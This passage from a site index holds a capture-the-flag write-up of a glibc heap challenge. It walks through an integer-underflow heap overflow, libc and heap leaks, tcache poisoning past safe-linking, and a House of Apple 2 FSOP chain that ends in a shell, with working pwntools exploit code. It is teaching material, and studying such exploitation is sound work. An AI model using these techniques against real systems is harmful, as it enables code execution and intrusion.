bugs in a Bun bookstore: string price NaN trick, then batch INSERT column inference.","title":"Narnes and Bobles \u0026 
Bobles and Narnes","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/path-traversal/","section":"Tags","summary":"","title":"Path-Traversal","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/sqlite/","section":"Tags","summary":"","title":"Sqlite","type":"tags"},{"content":"I\u0026rsquo;m telling you, tcache poisoning doesn\u0026rsquo;t just happen due to double-frees!\nnc chall.lac.tf 31144 The challenge is a classic heap note manager (create, delete, read) with only 2 note slots and a maximum allocation size of 0xf8. The vulnerability is an integer underflow in the size calculation that gives us a massive heap overflow. We\u0026rsquo;ll cover two approaches to get a shell from there: the intended solution overwrites strlen\u0026rsquo;s GOT entry inside libc itself, and the alternative uses a House of Apple 2 FSOP chain. Both leak heap and libc addresses via the overflow primitive.\nThe vulnerability # Here\u0026rsquo;s the function that reads data into a note. Pay attention to the developer\u0026rsquo;s comment:\nint read_data_into_note(int index, char *note, unsigned short size) { // I prevented all off-by-one\u0026#39;s by forcing the size to be at least 7 // less than what was declared by the user! I am so smart unsigned short resized_size = size == 8 ? (unsigned short)(size - 7) : (unsigned short)(size - 8); int bytes = read(0, note, resized_size); if (bytes \u0026lt; 0) { puts(\u0026#34;Read error\u0026#34;); exit(1); } if (note[bytes-1] == \u0026#39;\\n\u0026#39;) note[bytes-1] = \u0026#39;\\x00\u0026#39;; } The developer was so focused on preventing off-by-one errors that they missed something much worse. The special case for size == 8 makes resized_size = 1, and all other sizes get 8 subtracted. Sounds safe, right?\nHere\u0026rsquo;s how the note gets created:\nvoid create_note() { int index = get_note_index(); unsigned short size; // ... 
scanf(\u0026#34;%hu\u0026#34;, \u0026amp;size); if (size \u0026lt; 0 || size \u0026gt; 0xf8) { puts(\u0026#34;Invalid size!!!\u0026#34;); exit(1); } notes[index] = malloc(size); printf(\u0026#34;Data: \u0026#34;); read_data_into_note(index, notes[index], size); } The size check allows size = 0. And when size = 0:\nsize == 8 is false, so we take the else branch resized_size = (unsigned short)(0 - 8) = 65528 The subtraction wraps around because unsigned short can\u0026rsquo;t go negative, it wraps to 65528 (0xfff8). Meanwhile, malloc(0) returns the smallest possible chunk (0x20 bytes). So read() will happily write 65528 bytes into a 0x20-byte allocation. The developer prevented the off-by-one and introduced a 65KB heap overflow instead.\nBackground: glibc heap internals # If you\u0026rsquo;re already comfortable with glibc malloc, tcache, safe-linking, and bin mechanics, skip ahead to the exploit strategy.\nChunks # Every malloc() allocation lives inside a \u0026ldquo;chunk.\u0026rdquo; A chunk has a 0x10-byte header (two 8-byte fields) followed by user data. Internally, glibc tracks the chunk by a pointer to the header (where prev_size starts). But malloc() returns a pointer 0x10 bytes later, to the start of the user data. So when you see malloc() return 0x5555deadbef0, the actual chunk header starts at 0x5555deadbee0.\nblock-beta columns 2 A[\"prev_size (8 bytes)\"]:1 B[\"size | flags (8 bytes)\"]:1 C[\"user data\\n(what malloc returns)\"]:2 style A fill:#2d333b,stroke:#444 style B fill:#2d333b,stroke:#444 style C fill:#1a6334,stroke:#2ea043 The size field includes metadata flags in the low 3 bits. The most important flag is bit 0 (PREV_INUSE), which indicates whether the previous chunk is allocated. When a chunk is freed, its user data area gets repurposed to store linked-list pointers (fd and bk).\nmalloc(0) returns a 0x20-size chunk (the minimum). malloc(0xf8) returns a 0x100-size chunk. 
The chunk size is the request plus 8 bytes for the size field, rounded up to a multiple of 0x10 (minimum 0x20); the next chunk\u0026rsquo;s prev_size doubles as the last 8 bytes of usable data, which is why a 0xf8-byte request fits in a 0x100 chunk.\nTcache # Tcache (thread-local cache) is the first place glibc looks when allocating or freeing small chunks. Each thread has bins for sizes 0x20, 0x30, \u0026hellip;, 0x410, each holding up to 7 chunks.\nWhen you free a chunk that fits in tcache:\nThe chunk goes onto the front of the tcache bin (LIFO stack) The first 8 bytes of user data become the fd pointer (next entry in the bin) When you malloc a chunk that has a matching tcache entry:\nPop the first entry from the tcache bin Return it immediately (no coalescing, no checks in older glibc) Safe-linking (glibc 2.32+) # Here\u0026rsquo;s the catch for modern exploitation. Since glibc 2.32, tcache (and fastbin) fd pointers are mangled:\n#define PROTECT_PTR(pos, ptr) ((size_t)(pos) \u0026gt;\u0026gt; 12) ^ (size_t)(ptr) #define REVEAL_PTR(pos, ptr) PROTECT_PTR(pos, ptr) // same operation (XOR is self-inverse) When a chunk is freed into tcache, instead of storing fd = next_chunk, glibc stores:\nfd = (address_of_fd_field \u0026gt;\u0026gt; 12) XOR next_chunk_address To poison the tcache, we need to know address_of_fd_field \u0026gt;\u0026gt; 12, which means we need a heap leak first.\nFor the very first chunk in an empty tcache bin, next_chunk_address = NULL, so:\nfd = (address_of_fd_field \u0026gt;\u0026gt; 12) XOR 0 = address_of_fd_field \u0026gt;\u0026gt; 12 This gives us a heap leak for free: if we can read the fd of a singly-freed tcache chunk, we get heap_addr \u0026gt;\u0026gt; 12.\nUnsorted bin, large bins, and small bins # When a chunk is too large for tcache (\u0026gt; 0x410) or tcache is full, it goes to the unsorted bin: a doubly-linked list hanging off main_arena in libc.\nWhen malloc needs a chunk and tcache is empty, it searches the unsorted bin. 
Chunks that don\u0026rsquo;t match get sorted into size-appropriate bins:\nSmall bins: for sizes \u0026lt; 0x400 (exact-size bins, like tcache but doubly-linked) Large bins: for sizes \u0026gt;= 0x400 (range-based, sorted by size) The key insight for leaking libc: when a chunk is alone in a bin, its fd and bk pointers point back to the bin header inside main_arena, which lives at a known offset from the libc base.\nlibc\u0026rsquo;s internal GOT # Just like the main binary, libc.so.6 itself has a GOT (Global Offset Table) for resolving function calls. Functions like strlen, memcpy, and strncpy use GNU ifunc (indirect functions) to select a CPU-optimized implementation at runtime (e.g., an AVX2 strlen if the CPU supports it). These ifunc GOT entries need to be writable during resolution.\nglibc 2.35 is built with Partial RELRO, not Full RELRO. That means the ifunc GOT entries remain writable for the entire lifetime of the process, even after resolution completes. This was a known weakness, and newer glibc versions (2.39+) started hardening this by making libc\u0026rsquo;s own GOT read-only after ifunc resolution. But glibc 2.35 predates that fix, so these entries are fair game.\nThis matters because puts() internally calls strlen() to determine the string length. If we can overwrite strlen\u0026rsquo;s GOT entry inside libc with system, then puts(str) becomes system(str). 
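As a purely illustrative analogy (toy Python, nothing here is glibc; libc_got, puts, and system below are stand-ins), the attack amounts to swapping one entry in a writable dispatch table that another function calls through:

```python
# Toy model of puts() resolving strlen() through a writable "GOT".
calls = []

libc_got = {"strlen": len}            # the resolved ifunc entry

def puts(s: str) -> None:
    n = libc_got["strlen"](s)         # indirect call through the table
    calls.append(("write", s, n))

def system(cmd: str) -> int:          # stand-in for libc's system()
    calls.append(("system", cmd))
    return 0

puts("hello")                         # normal behaviour: dispatches to len
libc_got["strlen"] = system           # the "GOT overwrite"
puts("/bin/sh")                       # now dispatches to system("/bin/sh")
```

Partial RELRO is what keeps the real table writable; with Full RELRO the equivalent of libc_got would be read-only after startup and the swap would fault.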
On glibc 2.35 (Ubuntu 22.04), pwntools can resolve these directly: libc.got['strncpy'] and libc.got['strlen'] are the writable ifunc GOT entries, sitting just above the RELRO boundary.\nExploit strategy # Both approaches share the same setup:\nForge a fake 0x200 chunk using the heap overflow, iteratively filling tcache and pushing one into the unsorted bin Leak libc by overflowing non-null padding up to the unsorted bin fd pointer, then reading through it with puts() Leak the heap the same way: overflow padding reaches a tcache chunk\u0026rsquo;s mangled fd Then the approaches diverge:\nApproach 1 (intended): Poison tcache → overwrite strlen GOT in libc with system → puts(\u0026quot;/bin/sh\u0026quot;) triggers system(\u0026quot;/bin/sh\u0026quot;) Approach 2 (alternative): Poison tcache → overwrite _IO_list_all → trigger House of Apple 2 FSOP via exit() Phase 1: Iterative tcache fill → unsorted bin # We need a freed chunk in the unsorted bin to get a libc leak. The unsorted bin is a doubly-linked list managed by glibc\u0026rsquo;s allocator, and its list head lives inside main_arena, a global struct in libc that holds all of the allocator\u0026rsquo;s bookkeeping (bin heads, top chunk pointer, etc.). When a chunk is the only entry in the unsorted bin, its fd and bk both point back to the list head at main_arena + 96, which is a known fixed offset inside libc. Leaking either pointer gives us libc\u0026rsquo;s base address.\nChunks only go to the unsorted bin when their tcache bin is full (7 entries). Otherwise, free() puts them in tcache, where fd pointers are heap addresses (useless for a libc leak).\nWhy forge a different size? # Our max allocation is 0xf8, which gives us chunk size 0x100 at most. We only have 2 note slots. If we kept freeing real 0x100 chunks, the next malloc(0xf8) would just pull them right back out of tcache[0x100], and we\u0026rsquo;d never fill it. The trick is to forge a size that doesn\u0026rsquo;t match what we allocate. 
We allocate 0x20 chunks (via size=0xc), but overflow to rewrite the chunk header to 0x201 before freeing. The low 3 bits of the size field are flags, not part of the size: bit 0 is PREV_INUSE (indicating the previous chunk is allocated), which must be set or glibc thinks the previous chunk is free and tries to coalesce. So 0x201 = size 0x200 with PREV_INUSE set. Glibc sees a 0x200 chunk and puts it in tcache[0x200]. Our subsequent malloc(0xc) allocations pull from tcache[0x20], so the 0x200 entries stay in tcache and accumulate. After 7 iterations, tcache[0x200] is full, and the 8th free goes to the unsorted bin.\nThe loop # Each iteration: create two 0x20 chunks, free note0 (goes to tcache[0x20]), then re-create note0 with size=4 (triggering the overflow) to rewrite note1\u0026rsquo;s chunk header from 0x21 to 0x201. Then free note1 (glibc sees 0x200), free note0.\nfor i in range(8): create(io, 0, 0xc, b\u0026#39;X\u0026#39;) # note0: 0x20 chunk create(io, 1, 0xc, b\u0026#39;X\u0026#39;) # note1: 0x20 chunk delete(io, 0) # free note0 -\u0026gt; tcache[0x20] # Overflow from note0 to forge note1\u0026#39;s size as 0x201 overflow = b\u0026#39;A\u0026#39; * (0x10 + i * 0x20) # padding grows each iteration overflow += p64(0x20) + p64(0x201) # forged prev_size + size overflow += b\u0026#39;A\u0026#39; * 0x18 # chunk body padding overflow += p64(0x20d31 - i * 0x20) # preserve top chunk size if i == 7: # last iteration: unsorted bin needs fence chunks overflow += b\u0026#39;A\u0026#39; * 0x1d8 overflow += p64(0x21) + b\u0026#39;A\u0026#39; * 0x18 + p64(0x21) create(io, 0, 4, overflow) # size=4 -\u0026gt; resized to 65532, overflow! delete(io, 1) # free forged 0x200 chunk delete(io, 0) Why the padding grows # On each iteration, note0 is recycled from tcache[0x20] at the same address (heap+0x290). But note1 is allocated fresh from the top chunk each time, because its previous 0x20 chunk was freed as a 0x200 entry into a different tcache bin. 
So note1 moves 0x20 bytes further from note0 on each pass, and the overflow padding grows by 0x20 to bridge the increasing gap.\nTop chunk size # The top chunk is the free space at the end of the heap. Every allocation carves bytes from it, and glibc tracks its size in the chunk header. If it\u0026rsquo;s wrong, future allocations crash.\nThe initial heap is 0x21000 bytes (glibc\u0026rsquo;s default brk allocation). At the start of the loop, the heap looks like:\nblock-beta columns 2 a[\"0x000\"]:1 A[\"tcache_perthread_struct (0x290)\"]:1 b[\"0x290\"]:1 B[\"note0 (0x20)\"]:1 c[\"0x2B0\"]:1 C[\"note1 (0x20)\"]:1 d[\"0x2D0\"]:1 D[\"top chunk (0x20D31)\"]:1 style a fill:none,stroke:none,color:#8b949e style b fill:none,stroke:none,color:#8b949e style c fill:none,stroke:none,color:#8b949e style d fill:none,stroke:none,color:#8b949e style A fill:#2d333b,stroke:#444 style B fill:#1a6334,stroke:#2ea043 style C fill:#1a6334,stroke:#2ea043 style D fill:#1c3049,stroke:#388bfd So the top chunk size = 0x21000 - 0x2D0 = 0x20D30, plus the PREV_INUSE bit = 0x20D31. Our overflow writes past note1 into the top chunk header, so we need to preserve this value. It shrinks by 0x20 each iteration as note1 moves further out, consuming more space from the top.\nFence chunks (iteration 7 only) # The first 7 frees go into tcache, which has almost no validation: it doesn\u0026rsquo;t check neighboring chunk headers at all. But the 8th free goes to the unsorted bin, which is pickier.\nYou might wonder: normally, freeing a chunk adjacent to the top chunk works fine, so why do we need fences? The difference is that normally, _int_free detects that the next chunk IS the top chunk (nextchunk == av-\u0026gt;top) and takes a special consolidate-with-top path that skips most checks. But our forged 0x200 chunk\u0026rsquo;s \u0026ldquo;next chunk\u0026rdquo; (at chunk + 0x200) lands somewhere in the middle of the top chunk, not at its actual header. 
Glibc doesn\u0026rsquo;t recognize it as the top chunk, so it takes the normal code path, which does three checks:\nNext chunk\u0026rsquo;s PREV_INUSE bit: at chunk + size, the next chunk\u0026rsquo;s size field must have bit 0 set (PREV_INUSE). Otherwise glibc thinks our chunk is already free and aborts with \u0026ldquo;double free or corruption\u0026rdquo;. Next chunk\u0026rsquo;s size must be reasonable: glibc checks 2 * SIZE_SZ \u0026lt; next_size \u0026lt; av-\u0026gt;system_mem, where SIZE_SZ is sizeof(size_t) (8 on 64-bit, so the minimum is 0x10), and av is the malloc_state* pointer to the arena (i.e., main_arena), whose system_mem field tracks how much memory the arena has obtained from the OS via brk (0x21000 in our case). A zero or impossibly large size triggers \u0026ldquo;invalid next size\u0026rdquo;. Next-next chunk\u0026rsquo;s PREV_INUSE bit: glibc reads the chunk at nextchunk + nextsize to check its PREV_INUSE bit. If it\u0026rsquo;s clear, glibc thinks nextchunk is also free and tries to forward-consolidate by unlinking it from its bin. That unlink follows fd/bk pointers, which would crash on our garbage data. We write two fake 0x21 headers as \u0026ldquo;fences\u0026rdquo; after the forged chunk. Here\u0026rsquo;s how glibc navigates them:\nblock-beta columns 5 A[\"forged 0x200 chunk\"]:2 B[\"fence₁ (0x21)\"]:1 C[\"0x18 body\"]:1 D[\"fence₂ (0x21)\"]:1 style A fill:#1c3049,stroke:#388bfd style B fill:#5a3a1e,stroke:#d29922 style C fill:#5a3a1e,stroke:#d29922 style D fill:#1c3049,stroke:#388bfd Step 1: glibc looks at chunk + 0x200 (the forged size) and finds fence₁. It reads the size field: 0x21 = size 0x20 with PREV_INUSE set. This satisfies checks 1 (PREV_INUSE) and 2 (0x20 is a valid size).\nStep 2: glibc then needs to check if fence₁ itself is free (to decide about forward consolidation). It does this by looking at fence₁\u0026rsquo;s \u0026ldquo;next chunk\u0026rdquo;, which is at fence₁ + 0x20 (fence₁\u0026rsquo;s size). 
Remember the chunk layout from earlier:\nblock-beta columns 4 a[\"fence₁\"]:1 B[\"size: 0x21\\n(8 bytes)\"]:1 C[\"chunk body\\n(0x18 bytes)\"]:1 D[\"fence₂\\nsize: 0x21\"]:1 style a fill:none,stroke:none,color:#8b949e style B fill:#5a3a1e,stroke:#d29922 style C fill:#5a3a1e,stroke:#d29922 style D fill:#1c3049,stroke:#388bfd Fence₁ is a 0x20-size chunk: 0x8 bytes for the size field + 0x18 bytes of body = 0x20 total. So fence₁ + 0x20 lands exactly at fence₂. Glibc reads fence₂\u0026rsquo;s PREV_INUSE bit (set), concludes fence₁ is in-use, and skips consolidation. Check 3 satisfied.\nThe 0x18 bytes between the two fences isn\u0026rsquo;t arbitrary padding. It\u0026rsquo;s fence₁\u0026rsquo;s chunk body, and it\u0026rsquo;s exactly the right size to make glibc\u0026rsquo;s fence₁ + size arithmetic land on fence₂.\nThis is only needed on the last iteration because that\u0026rsquo;s the only free that hits the unsorted bin path.\nPhase 2: Libc leak # After the loop, the unsorted bin contains a chunk with fd and bk pointing back to the unsorted bin\u0026rsquo;s list head inside main_arena. But why is that at offset 96 (0x60)? Let\u0026rsquo;s trace through the real glibc source.\nThe malloc_state struct (malloc/malloc.c) defines main_arena\u0026rsquo;s layout:\nstruct malloc_state { __libc_lock_define (, mutex); // 0x00: 4 bytes int flags; // 0x04: 4 bytes int have_fastchunks; // 0x08: 4 bytes (+4 padding) mfastbinptr fastbinsY[NFASTBINS]; // 0x10: 10 * 8 = 80 bytes mchunkptr top; // 0x60: 8 bytes mchunkptr last_remainder; // 0x68: 8 bytes mchunkptr bins[NBINS * 2 - 2]; // 0x70: the bin array // ... }; The unsorted bin is bin index 1. 
Glibc accesses bins through the bin_at macro that treats the bins array as if each pair of entries is the fd/bk of a fake malloc_chunk:\n#define bin_at(m, i) \\ (mbinptr) (((char *) \u0026amp;((m)-\u0026gt;bins[((i) - 1) * 2])) \\ - offsetof (struct malloc_chunk, fd)) Since fd is at offset 0x10 in malloc_chunk (after the 8-byte prev_size and 8-byte size header fields), bin_at(main_arena, 1) points 0x10 bytes before bins[0]. That\u0026rsquo;s 0x70 - 0x10 = 0x60 = 96 bytes into main_arena. When a freed chunk is alone in the unsorted bin, its fd and bk both point back to this fake chunk header, giving us main_arena + 96.\nWe need to read this pointer.\nThe trick: overflow from note0 with a long padding of 'A' bytes that bridges the gap between note0 and the unsorted bin chunk\u0026rsquo;s data area. When we call puts(notes[0]), it prints the 'A' padding and continues past it into the unsorted bin fd pointer, until it hits a null byte.\nblock-beta columns 5 a[\"0x2A0\"]:1 A[\"note0\\ndata\"]:1 B[\"'A' * 0x100 overflow\"]:2 C[\"fd\\n→ main_arena+96\"]:1 style a fill:none,stroke:none,color:#8b949e style A fill:#1a6334,stroke:#2ea043 style B fill:#5a3a1e,stroke:#d29922 style C fill:#6e3630,stroke:#f85149 puts() starts at note0\u0026rsquo;s data (0x2A0), reads through the 0x100 bytes of 'A' padding (no null bytes), and continues into the fd pointer. Since libc addresses look like 0x7f??????????, the low 6 bytes are non-null in little endian, so puts() prints them before hitting the null high bytes.\ncreate(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) # overflow: 0x100 \u0026#39;A\u0026#39;s reach the fd data = show(io, 0) # puts() prints: \u0026#39;A\u0026#39;*0x100 + fd bytes UNSORTED_FD = 0x21ace0 # main_arena + 96 (unsorted bin fd) libc.address = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) - UNSORTED_FD Phase 3: Heap leak # For tcache poisoning, we need to know heap_addr \u0026gt;\u0026gt; 12 to compute the safe-linking mangled pointer. 
We leak this the same way as the libc leak: overflow padding + puts(), but this time targeting a tcache chunk\u0026rsquo;s mangled fd.\nFirst, we need to fix up the heap. The libc leak overwrote everything with 'A' bytes, corrupting the unsorted bin chunk\u0026rsquo;s fd/bk pointers and surrounding headers. If we leave it like this, glibc will crash on the next allocation that touches the unsorted bin. We use another overflow to restore valid metadata:\nunsorted_fd = libc.address + UNSORTED_FD delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21) + p64(unsorted_fd) * 2 + p64(0x20) + p64(0x20c50)) What each piece restores (starting from note0\u0026rsquo;s data at 0x2A0):\nblock-beta columns 5 a[\"0x2A0\"]:1 A[\"'A' * 0xf8\\npadding\"]:1 B[\"0x21\\nchunk hdr\"]:1 C[\"fd + bk\\n→ unsorted bin\"]:1 D[\"top chunk\\nsize\"]:1 style a fill:none,stroke:none,color:#8b949e style A fill:#2d333b,stroke:#444 style B fill:#5a3a1e,stroke:#d29922 style C fill:#6e3630,stroke:#f85149 style D fill:#1c3049,stroke:#388bfd b'A' * 0xf8 - padding to reach the corrupted area p64(0x21) - restores the chunk header before the unsorted bin chunk (size 0x20 + PREV_INUSE) p64(unsorted_fd) * 2 - restores the unsorted bin chunk\u0026rsquo;s fd and bk back to main_arena + 96, so the allocator sees a valid doubly-linked list p64(0x20) + p64(0x20c50) - restores prev_size and the top chunk size so future allocations from top don\u0026rsquo;t crash Then we set up a tcache[0x20] entry to leak from. 
When note1 is freed into an empty tcache bin, its fd becomes PROTECT_PTR(pos, NULL) = pos \u0026gt;\u0026gt; 12 (the mangler value):\ncreate(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 1) # tcache[0x20]: note1 (fd = \u0026amp;fd \u0026gt;\u0026gt; 12) delete(io, 0) # tcache[0x20]: note0 -\u0026gt; note1 flowchart LR T[\"tcache[0x20]\"] --\u003e A[\"note0\"] --\u003e B[\"note1 (fd = heap \u003e\u003e 12)\"] --\u003e N[\"NULL\"] style T fill:#2d333b,stroke:#444 style A fill:#1a6334,stroke:#2ea043 style B fill:#6e3630,stroke:#f85149 style N fill:none,stroke:#444,color:#8b949e note1 was freed first into an empty bin, so its fd = pos \u0026gt;\u0026gt; 12. note0 was freed second, so it points to note1.\nNow the same overflow trick: re-create note0 with size=4, write 0x100 'A' bytes that bridge from note0\u0026rsquo;s data all the way to note1\u0026rsquo;s fd:\ncreate(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) mangler = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) block-beta columns 5 a[\"0x2A0\"]:1 A[\"note0\\ndata\"]:1 B[\"'A' * 0x100 overflow\"]:2 C[\"fd\\n= heap \u003e\u003e 12\"]:1 style a fill:none,stroke:none,color:#8b949e style A fill:#1a6334,stroke:#2ea043 style B fill:#5a3a1e,stroke:#d29922 style C fill:#6e3630,stroke:#f85149 The mangler value has the form 0x00000000055xxxxx: the low 4-5 bytes are non-null, which puts() prints. The high bytes are zero, but ljust(8, b'\\x00') fills those in. This gives us the exact value we need for PROTECT_PTR.\nPhase 4: Tcache poisoning # Now we have both heap and libc addresses. We need to make malloc() return a pointer to _IO_list_all in libc. 
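Making malloc() hand back an arbitrary pointer means working through the safe-linking mangling, and that arithmetic can be checked in isolation. The addresses below are made up for illustration:

```python
# Safe-linking round trip with illustrative (made-up) addresses.
PROTECT_PTR = lambda pos, ptr: (pos >> 12) ^ ptr   # glibc 2.32+ mangling

heap_fd_addr = 0x55550000a2c0      # where a freed chunk's fd field lives
target       = 0x7f1234567890      # pretend this is _IO_list_all

# A chunk freed into an EMPTY bin stores PROTECT_PTR(pos, NULL),
# which is exactly the "mangler" value leaked in Phase 3:
mangler = PROTECT_PTR(heap_fd_addr, 0)
assert mangler == heap_fd_addr >> 12

# To poison, write mangler ^ target into the freed chunk's fd;
# malloc demangles it straight back to the target:
poisoned = mangler ^ target
assert PROTECT_PTR(heap_fd_addr, poisoned) == target
```

The XOR is self-inverse, so knowing heap >> 12 is both necessary and sufficient to forge any fd.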
The technique: tcache poisoning.\nThe idea:\nFree two 0x30-size chunks into the tcache: chunk_A -\u0026gt; chunk_B -\u0026gt; NULL Overwrite chunk_A\u0026rsquo;s fd with a mangled pointer to _IO_list_all First malloc(0x20) returns chunk_A Second malloc(0x20) follows the poisoned fd and returns _IO_list_all Before poisoning:\nflowchart LR T[\"tcache[0x30]\"] --\u003e A[\"chunk_A\"] --\u003e B[\"chunk_B\"] --\u003e N[\"NULL\"] style T fill:#2d333b,stroke:#444 style A fill:#1a6334,stroke:#2ea043 style B fill:#1a6334,stroke:#2ea043 style N fill:none,stroke:#444,color:#8b949e After overflow corrupts chunk_A\u0026rsquo;s fd:\nflowchart LR T[\"tcache[0x30]\"] --\u003e A[\"chunk_A\"] --\u003e IO[\"_IO_list_all\\n(libc)\"] style T fill:#2d333b,stroke:#444 style A fill:#1a6334,stroke:#2ea043 style IO fill:#6e3630,stroke:#f85149 The safe-linked fd we need to write:\nmangled_target = mangler ^ io_list_all Where mangler is the heap_addr \u0026gt;\u0026gt; 12 value we recovered from the heap leak (Phase 3).\nWe use a second overflow (same size=0 trick) to write this poisoned fd into the freed tcache chunks. The overflow payload also contains our fake FILE struct for the FSOP chain, placed at a known heap offset. Pwntools\u0026rsquo; flat() is very useful here: instead of slicing into a bytearray at magic offsets, we describe the payload as {offset: data}:\no2 = flat({ 0xb0: p64(mangled_target), # poisoned fd -\u0026gt; _IO_list_all 0x160: bytes(fp), # fake FILE struct 0x248: wide_data, # fake _wide_data 0x330: wide_vtable, # fake wide vtable # ... }, filler=b\u0026#39;\\x00\u0026#39;, length=0x400) Phase 5: House of Apple 2 FSOP # What is _IO_list_all? # In glibc, every open FILE (stdin, stdout, stderr, and any fopen()\u0026rsquo;d files) is a _IO_FILE struct. These are linked together in a singly-linked list, and _IO_list_all is the global pointer to the head of that list. Normally it points to stderr → stdout → stdin → NULL.\nWhat is FSOP? 
# FSOP (File Stream Oriented Programming) abuses the fact that glibc walks this list and calls virtual functions on each FILE in certain situations. The most useful trigger is exit(): when a program exits, glibc calls _IO_flush_all_lockp() to flush every open file\u0026rsquo;s buffers (write any buffered data out to the underlying file descriptor). For each FILE in the list, it calls the overflow function from the FILE\u0026rsquo;s vtable (a function pointer table at offset 0xd8 in the struct). Normally, overflow is what writes a FILE\u0026rsquo;s internal buffer out to the actual file descriptor when the buffer is full (the buffer \u0026ldquo;overflows\u0026rdquo;, so it needs to be drained). During exit, it\u0026rsquo;s called one last time to flush any remaining data.\nIf we can overwrite _IO_list_all to point at a fake FILE struct we control, glibc will call whatever function pointer we put in the vtable. That\u0026rsquo;s arbitrary code execution. And _IO_list_all is not protected by RELRO. It\u0026rsquo;s a regular global variable in libc\u0026rsquo;s writable data segment, not a GOT entry. RELRO only protects the GOT. Glibc needs to modify _IO_list_all at runtime whenever a file is opened or closed (e.g., fopen() prepends to the list), so it has to be writable. We use our tcache poisoning from Phase 4 to make malloc() return a pointer to it, then write the address of our fake FILE. This replaces the entire list: the real FILEs (stderr, stdout, stdin) are no longer reachable, and glibc only processes our fake FILE before hitting NULL.\nWhy House of Apple 2? # In glibc 2.24+, the main vtable pointer is validated by IO_validate_vtable(). It must point within a legitimate vtable section, so we can\u0026rsquo;t just point it at system directly. House of Apple 2 bypasses this by setting the vtable to _IO_wfile_jumps (a real, validated vtable). 
This routes execution through the wide character code path, which uses a second vtable (_wide_vtable) stored inside _wide_data. This second vtable is not validated, giving us a clean function pointer hijack.\nThe call chain in glibc source # We\u0026rsquo;ve written fake_file_addr to _IO_list_all via tcache poisoning. When exit(0) is called, glibc walks the FILE list and calls each FILE\u0026rsquo;s vtable overflow. Since we set the vtable to _IO_wfile_jumps, the first function called is _IO_wfile_overflow. Here\u0026rsquo;s the real glibc 2.35 source (libio/wfileops.c):\nwint_t _IO_wfile_overflow (FILE *f, wint_t wch) { if (f-\u0026gt;_flags \u0026amp; _IO_NO_WRITES) { /* ... error ... */ } /* If currently reading or no buffer allocated. */ if ((f-\u0026gt;_flags \u0026amp; _IO_CURRENTLY_PUTTING) == 0) { if (f-\u0026gt;_wide_data-\u0026gt;_IO_write_base == 0) { _IO_wdoallocbuf (f); // \u0026lt;-- we reach here // ... Constraint: _flags must not have _IO_NO_WRITES (0x8) or _IO_CURRENTLY_PUTTING (0x800), and _wide_data-\u0026gt;_IO_write_base must be NULL. Our \u0026quot; sh\\x00\u0026quot; flags value (0x00687320 in little endian) satisfies all of these.\nNext, _IO_wdoallocbuf (libio/wgenops.c):\nvoid _IO_wdoallocbuf (FILE *fp) { if (fp-\u0026gt;_wide_data-\u0026gt;_IO_buf_base) return; // must be NULL to continue if (!(fp-\u0026gt;_flags \u0026amp; _IO_UNBUFFERED)) if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF) // \u0026lt;-- dispatches through wide vtable return; // ... Constraint: _wide_data-\u0026gt;_IO_buf_base must be NULL and _flags must not have _IO_UNBUFFERED (0x2).\nFinally, _IO_WDOALLOCATE is a macro (libio/libioP.h) that dispatches through the wide vtable:\n#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP) // expands to: // (FP-\u0026gt;_wide_data-\u0026gt;_wide_vtable-\u0026gt;__doallocate)(FP) The FP pointer is passed as the first argument. 
Since _flags is at offset 0 of the FILE struct and we set it to \u0026quot; sh\\x00\u0026quot;, the call becomes system(\u0026quot; sh\u0026quot;).\nThe full chain:\nexit() → _IO_flush_all_lockp() → _IO_wfile_overflow(fp, EOF) vtable-\u0026gt;overflow → _IO_wdoallocbuf(fp) _wide_data-\u0026gt;_IO_write_base == NULL → _IO_WDOALLOCATE(fp) _wide_data-\u0026gt;_IO_buf_base == NULL → fp-\u0026gt;_wide_data-\u0026gt;_wide_vtable-\u0026gt;__doallocate(fp) → system(\u0026#34; sh\u0026#34;) offset 0x68 in our fake wide vtable Building the fake FILE # A _IO_FILE struct is large (~0xe8 bytes) with many fields. We only need to set a few to steer execution. Pwntools provides FileStructure for constructing these with named fields instead of raw byte offsets:\nfake_file_addr = heap_base + 0x400 # known location on heap fp = FileStructure() fp.flags = u64(b\u0026#39; sh\\x00\\x00\\x00\\x00\\x00\u0026#39;) # doubles as system() argument! fp._IO_buf_base = 0 # triggers _IO_wdoallocbuf fp._lock = fake_file_addr + 0xe0 # must point to writable NULL fp._wide_data = fake_file_addr + 0xe8 # -\u0026gt; our fake wide data struct fp.vtable = io_wfile_jumps # _IO_wfile_jumps (legitimate vtable) # _mode is at offset 0xc0, inside FileStructure\u0026#39;s \u0026#34;unknown2\u0026#34; region mode_data = bytearray(48) mode_data[0x18:0x1c] = p32(1) # _mode = 1 (enables wide code path) fp.unknown2 = bytes(mode_data) The _flags field is at offset 0 of the FILE struct. When system() is called, its argument is a pointer to the FILE struct itself, so the first bytes of _flags become the command string. 
We set it to \u0026quot; sh\\x00\u0026quot; (space + sh), which system() interprets as running /bin/sh.\nThe wide data and wide vtable # The _wide_data struct and its vtable don\u0026rsquo;t have pwntools helpers, but we can use flat() to place data at named offsets rather than slicing bytearrays:\n# Fake _wide_data (pointed to by fp._wide_data) wide_data = flat({ 0x18: p64(0), # _IO_write_base = 0 0x20: p64(1), # _IO_write_ptr = 1 (must be \u0026gt; write_base) 0x30: p64(0), # _IO_buf_base = 0 0xe0: p64(wide_vtable_addr), # _wide_vtable -\u0026gt; our fake vtable }, filler=b\u0026#39;\\x00\u0026#39;, length=0xe8) # Fake wide vtable wide_vtable = flat({ 0x68: p64(system_addr), # __doallocate offset }, filler=b\u0026#39;\\x00\u0026#39;, length=0x70) The chain: _IO_wfile_overflow sees write_ptr \u0026gt; write_base, checks _IO_buf_base == NULL, calls _IO_wdoallocbuf, which calls _IO_WDOALLOCATE. This dereferences _wide_vtable-\u0026gt;__doallocate (offset 0x68), which we\u0026rsquo;ve pointed to system.\nAlternative: libc GOT overwrite (intended solution) # The intended solution skips FSOP entirely. Instead of building fake FILE structs and triggering exit(), it overwrites 